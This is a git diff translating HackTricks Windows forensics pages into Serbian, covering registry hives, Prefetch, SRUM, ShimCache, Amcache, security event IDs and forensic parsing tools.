### Image Thumbnails -- **Windows XP and 8-8.1**: Accessing a folder with thumbnails generates a `thumbs.db` file storing image previews, even after deletion. -- **Windows 7/10**: `thumbs.db` is created when accessed over a network via UNC path. -- **Windows Vista and newer**: Thumbnail previews are centralized in `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` with files named **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) and [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) are tools for viewing these files. +- **Windows XP i 8-8.1**: Pristup folderu sa sličicama generiše `thumbs.db` datoteku koja čuva prikaze slika, čak i nakon brisanja. +- **Windows 7/10**: `thumbs.db` se kreira kada se pristupa preko mreže putem UNC puta. +- **Windows Vista i novije**: Prikazi sličica su centralizovani u `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` sa datotekama imenovanim **thumbcache_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) i [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) su alati za pregled ovih datoteka. ### Windows Registry Information -The Windows Registry, storing extensive system and user activity data, is contained within files in: +Windows Registry, koji čuva opsežne podatke o sistemu i korisničkim aktivnostima, sadrži se unutar datoteka u: -- `%windir%\System32\Config` for various `HKEY_LOCAL_MACHINE` subkeys. -- `%UserProfile%{User}\NTUSER.DAT` for `HKEY_CURRENT_USER`. -- Windows Vista and later versions back up `HKEY_LOCAL_MACHINE` registry files in `%Windir%\System32\Config\RegBack\`. -- Additionally, program execution information is stored in `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` from Windows Vista and Windows 2008 Server onwards. +- `%windir%\System32\Config` za razne `HKEY_LOCAL_MACHINE` podključeve. +- `%UserProfile%{User}\NTUSER.DAT` za `HKEY_CURRENT_USER`. 
+- Windows Vista i novije verzije prave rezervne kopije `HKEY_LOCAL_MACHINE` registry datoteka u `%Windir%\System32\Config\RegBack\`. +- Pored toga, informacije o izvršenju programa se čuvaju u `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` od Windows Vista i Windows 2008 Server nadalje. ### Tools -Some tools are useful to analyze the registry files: +Neki alati su korisni za analizu registry datoteka: -- **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session. -- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows you to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information. -- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry. -- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded. +- **Registry Editor**: Instaliran je u Windows-u. To je GUI za navigaciju kroz Windows registry trenutne sesije. +- [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): Omogućava vam da učitate registry datoteku i navigirate kroz njih sa GUI-jem. Takođe sadrži oznake koje ističu ključeve sa zanimljivim informacijama. +- [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Ponovo, ima GUI koji omogućava navigaciju kroz učitani registry i takođe sadrži dodatke koji ističu zanimljive informacije unutar učitanog registry-a. +- [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Još jedna GUI aplikacija sposobna da izvuče važne informacije iz učitanog registry-a. 
### Recovering Deleted Element -When a key is deleted it's marked as such, but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys. +Kada je ključ obrisan, označen je kao takav, ali dok prostor koji zauzima nije potreban, neće biti uklonjen. Stoga, korišćenjem alata kao što je **Registry Explorer** moguće je povratiti ove obrisane ključeve. ### Last Write Time -Each Key-Value contains a **timestamp** indicating the last time it was modified. +Svaki Key-Value sadrži **vremensku oznaku** koja označava poslednji put kada je modifikovan. ### SAM -The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system. +Datoteka/hive **SAM** sadrži **korisnike, grupe i heširane lozinke korisnika** sistema. -In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, last failed logon, login counter, password policy and when the account was created. To get the **hashes** you also **need** the file/hive **SYSTEM**. +U `SAM\Domains\Account\Users` možete dobiti korisničko ime, RID, poslednju prijavu, poslednji neuspešni logon, brojač prijava, politiku lozinki i kada je nalog kreiran. Da biste dobili **hešove** takođe **trebate** datoteku/hive **SYSTEM**. ### Interesting entries in the Windows Registry 
@@ -276,229 +272,223 @@ interesting-windows-registry-keys.md ### Basic Windows Processes -In [this post](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) you can learn about the common Windows processes to detect suspicious behaviours. +U [ovom postu](https://jonahacks.medium.com/investigating-common-windows-processes-18dee5f97c1d) možete saznati o uobičajenim Windows procesima za otkrivanje sumnjivih ponašanja. ### Windows Recent APPs -Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched. +Unutar registra `NTUSER.DAT` na putu `Software\Microsoft\Current Version\Search\RecentApps` možete pronaći podključeve sa informacijama o **izvršenoj aplikaciji**, **poslednjem putu** kada je izvršena, i **broju puta** kada je pokrenuta. ### BAM (Background Activity Moderator) -You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** (note the `{SID}` in the path) and at **what time** they were executed (the time is inside the Data value of the registry). +Možete otvoriti datoteku `SYSTEM` sa registry editorom i unutar puta `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` možete pronaći informacije o **aplikacijama koje je izvršio svaki korisnik** (napomena na `{SID}` u putu) i **u koje vreme** su izvršene (vreme je unutar Data vrednosti registra). ### Windows Prefetch -Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed quicker. 
+Prefetching je tehnika koja omogućava računaru da tiho **preuzme potrebne resurse potrebne za prikazivanje sadržaja** koji korisnik **može pristupiti u bliskoj budućnosti** kako bi se resursi mogli brže pristupiti. -Windows prefetch consists of creating **caches of the executed programs** to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. There is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10. +Windows prefetch se sastoji od kreiranja **kešova izvršenih programa** kako bi ih mogli učitati brže. Ovi keševi se kreiraju kao `.pf` datoteke unutar puta: `C:\Windows\Prefetch`. Postoji limit od 128 datoteka u XP/VISTA/WIN7 i 1024 datoteka u Win8/Win10. -The file name is created as `{program_name}-{hash}.pf` (the hash is based on the path and arguments of the executable). In W10 these files are compressed. Do note that the sole presence of the file indicates that **the program was executed** at some point. +Ime datoteke se kreira kao `{program_name}-{hash}.pf` (heš se zasniva na putu i argumentima izvršnog programa). U W10 ove datoteke su kompresovane. Imajte na umu da sama prisutnost datoteke ukazuje da je **program izvršen** u nekom trenutku. -The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program. - -To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): +Datoteka `C:\Windows\Prefetch\Layout.ini` sadrži **imena foldera datoteka koje su prefethed**. Ova datoteka sadrži **informacije o broju izvršenja**, **datumima** izvršenja i **datotekama** **otvorenim** od strane programa. 
+Da biste pregledali ove datoteke, možete koristiti alat [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): ```bash .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" ``` - ![](<../../../images/image (315).png>) ### Superprefetch -**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\ -This service will generate database files in `C:\Windows\Prefetch\Ag*.db`. +**Superprefetch** ima isti cilj kao prefetch, **brže učitavanje programa** predviđanjem šta će biti učitano sledeće. Međutim, ne zamenjuje prefetch servis.\ +Ova usluga će generisati datoteke baze podataka u `C:\Windows\Prefetch\Ag*.db`. -In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**. +U ovim bazama podataka možete pronaći **ime** **programa**, **broj** **izvršavanja**, **otvorene** **datoteke**, **pristup** **volumenu**, **potpunu** **putanju**, **vremenske okvire** i **vremenske oznake**. -You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). +Možete pristupiti ovim informacijama koristeći alat [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). ### SRUM -**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`. +**Monitor korišćenja sistemskih resursa** (SRUM) **prati** **resurse** **koje koristi** **proces**. Pojavio se u W8 i čuva podatke u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`. 
-It gives the following information: +Daje sledeće informacije: -- AppID and Path -- User that executed the process -- Sent Bytes -- Received Bytes -- Network Interface -- Connection duration -- Process duration +- AppID i Putanja +- Korisnik koji je izvršio proces +- Poslati bajtovi +- Primljeni bajtovi +- Mrežni interfejs +- Trajanje veze +- Trajanje procesa -This information is updated every 60 mins. - -You can obtain the date from this file using the tool [**srum_dump**](https://github.com/MarkBaggett/srum-dump). +Ove informacije se ažuriraju svake 60 minuta. +Možete dobiti podatke iz ove datoteke koristeći alat [**srum_dump**](https://github.com/MarkBaggett/srum-dump). ```bash .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum ``` - ### AppCompatCache (ShimCache) -The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include: +**AppCompatCache**, poznat i kao **ShimCache**, deo je **Baze podataka o kompatibilnosti aplikacija** koju je razvila **Microsoft** kako bi se rešili problemi sa kompatibilnošću aplikacija. 
Ova sistemska komponenta beleži razne delove metapodataka o datotekama, koji uključuju: -- Full path of the file -- Size of the file -- Last Modified time under **$Standard_Information** (SI) -- Last Updated time of the ShimCache -- Process Execution Flag +- Puni put do datoteke +- Veličinu datoteke +- Vreme poslednje izmene pod **$Standard_Information** (SI) +- Vreme poslednje ažuriranja ShimCache-a +- Zastavicu izvršenja procesa -Such data is stored within the registry at specific locations based on the version of the operating system: +Ovi podaci se čuvaju u registru na specifičnim lokacijama u zavisnosti od verzije operativnog sistema: -- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. -- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively. +- Za XP, podaci se čuvaju pod `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` sa kapacitetom za 96 unosa. +- Za Server 2003, kao i za verzije Windows-a 2008, 2012, 2016, 7, 8 i 10, putanja za skladištenje je `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, sa kapacitetom od 512 i 1024 unosa, respektivno. -To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use. +Za parsiranje sačuvanih informacija, preporučuje se korišćenje [**AppCompatCacheParser** alata](https://github.com/EricZimmerman/AppCompatCacheParser). ![](<../../../images/image (75).png>) ### Amcache -The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`. 
+Datoteka **Amcache.hve** je u suštini registri hives koji beleži detalje o aplikacijama koje su izvršene na sistemu. Obično se nalazi na `C:\Windows\AppCompat\Programas\Amcache.hve`. -This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system. - -To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format: +Ova datoteka je značajna jer čuva zapise o nedavno izvršenim procesima, uključujući puteve do izvršnih datoteka i njihove SHA1 heš vrednosti. Ove informacije su neprocenjive za praćenje aktivnosti aplikacija na sistemu. +Za ekstrakciju i analizu podataka iz **Amcache.hve**, može se koristiti [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) alat. Sledeća komanda je primer kako koristiti AmcacheParser za parsiranje sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` +Među generisanim CSV datotekama, `Amcache_Unassociated file entries` je posebno značajan zbog bogatih informacija koje pruža o neudruženim unosima datoteka. -Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries. - -The most interesting CVS file generated is the `Amcache_Unassociated file entries`. +Najzanimljivija CVS datoteka koja je generisana je `Amcache_Unassociated file entries`. 
### RecentFileCache -This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries. +Ovaj artefakt se može naći samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnoj izvršavanju nekih binarnih datoteka. -You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file. +Možete koristiti alat [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) za analizu datoteke. -### Scheduled tasks +### Zakazane radnje -You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML. +Možete ih izvući iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i pročitati ih kao XML. -### Services +### Servisi -You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when. +Možete ih pronaći u registru pod `SYSTEM\ControlSet001\Services`. Možete videti šta će biti izvršeno i kada. ### **Windows Store** -The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\ -This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**. +Instalirane aplikacije se mogu naći u `\ProgramData\Microsoft\Windows\AppRepository\`\ +Ova biblioteka ima **log** sa **svakom instaliranom** aplikacijom u sistemu unutar baze podataka **`StateRepository-Machine.srd`**. -Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential. 
+Unutar tabele aplikacija ove baze podataka, moguće je pronaći kolone: "Application ID", "PackageNumber" i "Display Name". Ove kolone sadrže informacije o unapred instaliranim i instaliranim aplikacijama i može se utvrditi da li su neke aplikacije deinstalirane jer bi ID-ovi instaliranih aplikacija trebali biti sekvencijalni. -It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ -And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` +Takođe je moguće **pronaći instaliranu aplikaciju** unutar registra na putu: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +I **deinstalirane** **aplikacije** u: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` -## Windows Events +## Windows događaji -Information that appears inside Windows events are: +Informacije koje se pojavljuju unutar Windows događaja su: -- What happened -- Timestamp (UTC + 0) -- Users involved -- Hosts involved (hostname, IP) -- Assets accessed (files, folder, printer, services) +- Šta se desilo +- Vreme (UTC + 0) +- Uključeni korisnici +- Uključeni hostovi (hostname, IP) +- Pristupeni resursi (datoteke, folderi, štampači, servisi) -The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension. +Logovi se nalaze u `C:\Windows\System32\config` pre Windows Vista i u `C:\Windows\System32\winevt\Logs` posle Windows Vista. Pre Windows Vista, logovi događaja su bili u binarnom formatu, a posle toga su u **XML formatu** i koriste **.evtx** ekstenziju. 
-The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** +Lokacija datoteka događaja može se pronaći u SYSTEM registru u **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** -They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** +Mogu se vizualizovati iz Windows Event Viewer-a (**`eventvwr.msc`**) ili sa drugim alatima kao što su [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** -## Understanding Windows Security Event Logging +## Razumevanje Windows sigurnosnog logovanja događaja -Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access. +Događaji pristupa se beleže u datoteci sigurnosne konfiguracije koja se nalazi na `C:\Windows\System32\winevt\Security.evtx`. Veličina ove datoteke je prilagodljiva, a kada se dostigne njena kapacitet, stariji događaji se prepisuju. Beleženi događaji uključuju prijave i odjave korisnika, korisničke akcije i promene u sigurnosnim postavkama, kao i pristup datotekama, folderima i zajedničkim resursima. -### Key Event IDs for User Authentication: +### Ključni ID-evi događaja za autentifikaciju korisnika: -- **EventID 4624**: Indicates a user successfully authenticated. -- **EventID 4625**: Signals an authentication failure. -- **EventIDs 4634/4647**: Represent user logoff events. -- **EventID 4672**: Denotes login with administrative privileges. 
+- **EventID 4624**: Ukazuje na to da je korisnik uspešno autentifikovan. +- **EventID 4625**: Signalizira neuspeh autentifikacije. +- **EventIDs 4634/4647**: Predstavljaju događaje odjave korisnika. +- **EventID 4672**: Označava prijavu sa administratorskim privilegijama. -#### Sub-types within EventID 4634/4647: +#### Podtipovi unutar EventID 4634/4647: -- **Interactive (2)**: Direct user login. -- **Network (3)**: Access to shared folders. -- **Batch (4)**: Execution of batch processes. -- **Service (5)**: Service launches. -- **Proxy (6)**: Proxy authentication. -- **Unlock (7)**: Screen unlocked with a password. -- **Network Cleartext (8)**: Clear text password transmission, often from IIS. -- **New Credentials (9)**: Usage of different credentials for access. -- **Remote Interactive (10)**: Remote desktop or terminal services login. -- **Cache Interactive (11)**: Login with cached credentials without domain controller contact. -- **Cache Remote Interactive (12)**: Remote login with cached credentials. -- **Cached Unlock (13)**: Unlocking with cached credentials. +- **Interaktivno (2)**: Direktna prijava korisnika. +- **Mrežno (3)**: Pristup zajedničkim folderima. +- **Batch (4)**: Izvršavanje batch procesa. +- **Servis (5)**: Pokretanje servisa. +- **Proxy (6)**: Proxy autentifikacija. +- **Otključavanje (7)**: Ekran otključan lozinkom. +- **Mrežni čisti tekst (8)**: Prenos lozinke u čistom tekstu, često iz IIS-a. +- **Nove kredencijale (9)**: Korišćenje različitih kredencijala za pristup. +- **Daljinsko interaktivno (10)**: Prijava putem daljinske radne površine ili terminalskih usluga. +- **Keširano interaktivno (11)**: Prijava sa keširanim kredencijalima bez kontakta sa kontrolerom domena. +- **Keširano daljinsko interaktivno (12)**: Daljinska prijava sa keširanim kredencijalima. +- **Keširano otključavanje (13)**: Otključavanje sa keširanim kredencijalima. 
-#### Status and Sub Status Codes for EventID 4625: +#### Status i podstatus kodovi za EventID 4625: -- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack. -- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt. -- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins. -- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts. -- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access. -- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location. -- **0xC0000193**: Account expiration - Access attempts with expired user accounts. -- **0xC0000071**: Expired password - Login attempts with outdated passwords. -- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket. -- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security. -- **0xC0000225**: Indicates a system bug rather than a security issue. -- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon. +- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad na enumeraciju korisničkog imena. +- **0xC000006A**: Tačno korisničko ime, ali pogrešna lozinka - Mogući pokušaj pogađanja lozinke ili brute-force napad. +- **0xC0000234**: Korisnički nalog je zaključan - Može uslediti nakon brute-force napada koji rezultira višestrukim neuspelim prijavama. +- **0xC0000072**: Nalog onemogućen - Neovlašćeni pokušaji pristupa onemogućenim nalozima. 
+- **0xC000006F**: Prijava van dozvoljenog vremena - Ukazuje na pokušaje pristupa van postavljenih sati prijave, mogući znak neovlašćenog pristupa. +- **0xC0000070**: Kršenje ograničenja radne stanice - Može biti pokušaj prijave sa neovlašćenog mesta. +- **0xC0000193**: Istek naloga - Pokušaji pristupa sa isteklim korisničkim nalozima. +- **0xC0000071**: Istekla lozinka - Pokušaji prijave sa zastarelim lozinkama. +- **0xC0000133**: Problemi sa sinhronizacijom vremena - Velike vremenske razlike između klijenta i servera mogu ukazivati na sofisticiranije napade poput pass-the-ticket. +- **0xC0000224**: Obavezna promena lozinke potrebna - Česte obavezne promene mogu sugerisati pokušaj destabilizacije sigurnosti naloga. +- **0xC0000225**: Ukazuje na grešku sistema, a ne na sigurnosni problem. +- **0xC000015b**: Odbijeni tip prijave - Pokušaj pristupa sa neovlašćenim tipom prijave, kao što je korisnik koji pokušava da izvrši prijavu servisa. #### EventID 4616: -- **Time Change**: Modification of the system time, could obscure the timeline of events. +- **Promena vremena**: Izmena sistemskog vremena, može zamagliti vremensku liniju događaja. -#### EventID 6005 and 6006: +#### EventID 6005 i 6006: -- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down. +- **Pokretanje i gašenje sistema**: EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje. #### EventID 1102: -- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities. +- **Brisanje logova**: Brisanje sigurnosnih logova, što je često crvena zastava za prikrivanje nezakonitih aktivnosti. -#### EventIDs for USB Device Tracking: +#### EventIDs za praćenje USB uređaja: -- **20001 / 20003 / 10000**: USB device first connection. -- **10100**: USB driver update. -- **EventID 112**: Time of USB device insertion. +- **20001 / 20003 / 10000**: Prva konekcija USB uređaja. 
+- **10100**: Ažuriranje USB drajvera. +- **EventID 112**: Vreme umetanja USB uređaja. -For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). +Za praktične primere simulacije ovih tipova prijava i mogućnosti iskopavanja kredencijala, pogledajte [detaljni vodič Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). -Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625. +Detalji događaja, uključujući status i podstatus kodove, pružaju dodatne uvide u uzroke događaja, posebno u Event ID 4625. -### Recovering Windows Events +### Oporavak Windows događaja -To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events. +Da biste povećali šanse za oporavak obrisanih Windows događaja, preporučuje se da isključite sumnjivi računar direktnim isključivanjem. **Bulk_extractor**, alat za oporavak koji specificira ekstenziju `.evtx`, se preporučuje za pokušaj oporavka takvih događaja. -### Identifying Common Attacks via Windows Events +### Identifikacija uobičajenih napada putem Windows događaja -For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/). +Za sveobuhvatan vodič o korišćenju Windows Event ID-ova u identifikaciji uobičajenih sajber napada, posetite [Red Team Recipe](https://redteamrecipe.com/event-codes/). 
-#### Brute Force Attacks +#### Brute Force napadi -Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds. +Identifikovani višestrukim zapisima EventID 4625, praćenim EventID 4624 ako napad uspe. -#### Time Change +#### Promena vremena -Recorded by EventID 4616, changes to system time can complicate forensic analysis. +Zabeležena sa EventID 4616, promene u sistemskom vremenu mogu otežati forenzičku analizu. -#### USB Device Tracking +#### Praćenje USB uređaja -Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps. +Korisni sistemski EventID-ovi za praćenje USB uređaja uključuju 20001/20003/10000 za početnu upotrebu, 10100 za ažuriranja drajvera i EventID 112 iz DeviceSetupManager-a za vremenske oznake umetanja. -#### System Power Events +#### Događaji napajanja sistema -EventID 6005 indicates system startup, while EventID 6006 marks shutdown. +EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje. -#### Log Deletion +#### Brisanje logova -Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. +Sigurnosni EventID 1102 signalizira brisanje logova, kritičan događaj za forenzičku analizu. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 840b910bc..0376c8434 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md 
@@ -6,95 +6,95 @@ ### **Windows Version and Owner Info** -- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner. +- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you will find verziju Windows-a, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način. ### **Computer Name** -- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**. +- Ime računara se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**. ### **Time Zone Setting** -- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**. +- Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**. ### **Access Time Tracking** -- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use: - `fsutil behavior set disablelastaccess 0` +- Po defaultu, praćenje poslednjeg vremena pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite: +`fsutil behavior set disablelastaccess 0` ### Windows Versions and Service Packs -- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features. +- **Verzija Windows-a** označava izdanje (npr. Home, Pro) i njegovu verziju (npr. Windows 10, Windows 11), dok su **Service Packs** ažuriranja koja uključuju ispravke i, ponekad, nove funkcije. ### Enabling Last Access Time -- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring. 
+- Omogućavanje praćenja poslednjeg vremena pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema. ### Network Information Details -- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions. +- Registry sadrži opsežne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablovske, 3G)** i **kategorije mreža (Javna, Privatna/Domaća, Domen/Rad)**, što je od suštinskog značaja za razumevanje mrežnih bezbednosnih postavki i dozvola. ### Client Side Caching (CSC) -- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity. +- **CSC** poboljšava pristup offline datotekama keširanjem kopija deljenih datoteka. Različita podešavanja **CSCFlags** kontrolišu kako i koje datoteke se keširaju, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom povezanošću. ### AutoStart Programs -- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software. +- Programi navedeni u raznim `Run` i `RunOnce` registry ključevima se automatski pokreću prilikom pokretanja, utičući na vreme podizanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera. ### Shellbags -- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. 
